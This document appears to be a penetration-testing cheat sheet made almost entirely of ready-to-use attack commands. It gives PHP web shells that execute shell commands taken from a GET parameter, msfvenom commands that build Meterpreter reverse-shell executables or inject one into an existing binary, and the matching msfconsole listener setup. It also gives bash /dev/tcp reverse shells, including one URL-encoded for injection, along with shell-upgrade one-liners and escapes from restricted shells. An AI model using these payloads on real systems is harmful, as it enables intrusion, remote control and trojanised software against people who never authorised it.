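# Runs a fixed command (no user input reaches the shell)
<?php system("whoami"); ?>
# Web shell: shell.php?cmd=whoami — the isset() guard keeps a bare request (no ?cmd=) from
# emitting an "Undefined array key"/"Undefined index" warning that discloses the script's absolute path
<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
# Same with passthru (raw, binary-safe output)
<?php if (isset($_GET['cmd'])) { passthru($_GET['cmd']); } ?>
# shell_exec() only returns the output, so it has to be echoed to become visible
<?php echo shell_exec("whoami");?>
# preg_replace() with the /e modifier evaluates the replacement string as PHP code.
# /e was deprecated in PHP 5.5 and removed in 7.0: this variant only works on PHP < 7.
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
# Backticks are the operator form of shell_exec()
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
<?php echo `whoami`; ?>
# Caveats: every payload above is unauthenticated — anyone who can reach the file gets command
# execution, so remove it when the engagement ends. system/passthru/shell_exec (and therefore the
# backtick operator) are unavailable when the target's php.ini lists them in disable_functions.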
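# Windows reverse-TCP Meterpreter executable; replace IP/PORT with the listener's address/port
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell_reverse.exe
# Listener — the following lines are typed inside msfconsole; LHOST/LPORT must match the
# values baked into the payload, otherwise the handler never receives the connection
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT PORT
run
# Inject the payload into an existing executable used as template (-x). Without -k the
# template's own functionality is not preserved (the payload replaces its execution); add -k to
# keep the original behaviour and run the payload in a new thread. x86/shikata_ga_nai requires a
# 32-bit payload and template. Encoding exists for bad-character/size constraints, not AV evasion —
# repeated shikata_ga_nai iterations are generally detected by current AV/EDR.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -e x86/shikata_ga_nai -i 9 -x "/binario.exe" -o binariOutput.exe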
# Reverse shells — start a listener on the attacking host first (e.g. nc -lvnp PORT), then
# replace IP/PORT. fd 196 is opened read/write on the TCP socket and sh's stdin/stdout/stderr
# are tied to it. /dev/tcp and numeric-fd redirections are bash features: this line must be
# executed by bash, even though the spawned shell is sh.
0<&196;exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196
# Shorter bash-only form (>& redirects both stdout and stderr to the socket)
bash -i >& /dev/tcp/IP/PORT 0>&1
#encoded
# URL-encoded form of: bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1" — for injection through a GET
# parameter. The outer bash -c is what makes it work when the injecting process is not bash
# (e.g. /bin/sh spawned by system()).
bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2FIP%2FPORT%200%3E%261%22
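# Spawn an interactive shell from Python (e.g. to upgrade a dumb netcat shell to a PTY).
# Hosts without a `python` binary need python3 instead.
python -c 'import pty; pty.spawn("/bin/sh")'
python -c "import pty;pty.spawn('/bin/bash')"
# os.system() gives a shell without a PTY (no job control / line editing)
python -c 'import os; os.system("/bin/bash")'
# The same call as a line to paste into an interactive Python session (after `import os`),
# presumably what this line was meant for. Double-quoted so the inner single quotes survive:
# the original nested single quotes were stripped by the shell and printed os.system(/bin/bash),
# which is not valid Python.
echo "os.system('/bin/bash')"
# Perl
perl -e 'exec "/bin/sh";'
# From inside vim: run a shell directly, or set the shell to bash and then drop into it
:!bash
:set shell=/bin/bash
:sh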
4. Escaping restricted shells
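# When the restricted shell is the login shell, ask sshd to run a different shell instead
ssh username@IP -t "/bin/sh"
# Skip the profile that applies the restrictions (e.g. an rbash PATH lock-down)
ssh username@IP -t "bash --noprofile"
# Enumerate a directory via shell globbing when ls is not permitted
echo /usr/bin/*
# Command substitution may be allowed where the command itself is blocked.
# (The original `${whoami}` is parameter expansion — it expands an empty variable and runs
# nothing; the backtick form below is the equivalent that actually executes.)
$(whoami)
`whoami`
# Escape via editor shell-outs (vi/vim)
:!/bin/sh
:shell
:set shell=/bin/sh
# From an interactive Python session
import os; os.system("/bin/sh")
# From an interactive interpreter that exposes exec() — perl or php -a (see below)
exec("sh -i");
# PHP CLI one-liner
php -r "system('/bin/bash');"
# or start the interactive PHP shell and type the exec("sh -i"); line above
php -a
# awk and find can spawn a shell through their own exec/system hooks
awk 'BEGIN {system("/bin/sh")}'
find / -name foobar -exec /bin/sh \;
# tee writes a file even when > redirection is blocked; the resulting script still has to be run
echo "bash -i" | tee script.sh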